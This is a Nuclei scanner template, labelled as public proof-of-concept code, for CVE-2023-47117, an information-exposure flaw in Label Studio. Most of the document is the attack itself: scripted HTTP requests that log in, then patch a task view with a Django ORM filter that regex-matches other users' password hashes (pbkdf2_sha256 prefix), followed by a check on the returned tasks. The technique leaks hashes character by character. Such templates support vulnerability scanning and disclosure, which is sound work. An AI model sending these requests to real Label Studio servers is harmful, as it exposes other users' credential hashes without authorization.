An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
PoC代码[已公开]
id: CVE-2023-47117
info:
name: Label Studio - Sensitive Information Exposure
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
reference:
- https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
- https://nvd.nist.gov/vuln/detail/CVE-2023-47117
- https://github.com/elttam/publications
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-47117
cwe-id: CWE-200
epss-score: 0.65766
epss-percentile: 0.98458
cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: humansignal
product: label_studio
shodan-query: http.favicon.hash:-1649949475
tags: cve,cve2023,label_studio,oss,exposure,authenticated
variables:
Task_id: "{{task}}"
Project_id: "{{project}}"
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login/?next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on
- |
PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}
- |
GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
- 'status_code_3==200 && status_code_4==200'
- 'contains(header_4, "application/json")'
condition: and
extractors:
- type: regex
part: body
name: csrf
group: 1
regex:
- 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
internal: true
# digest: 4b0a00483046022100f51bc2a5f1c9c5a5c7fd139da8ac2b7b8ee429d753b1c54273bcbead143e05ee0221008c6aa63f913fab676e17de1ff658cba7704373b9f15e18a12e8efb0b6752d4b0:922c64590222798bb761d5b6d8e72950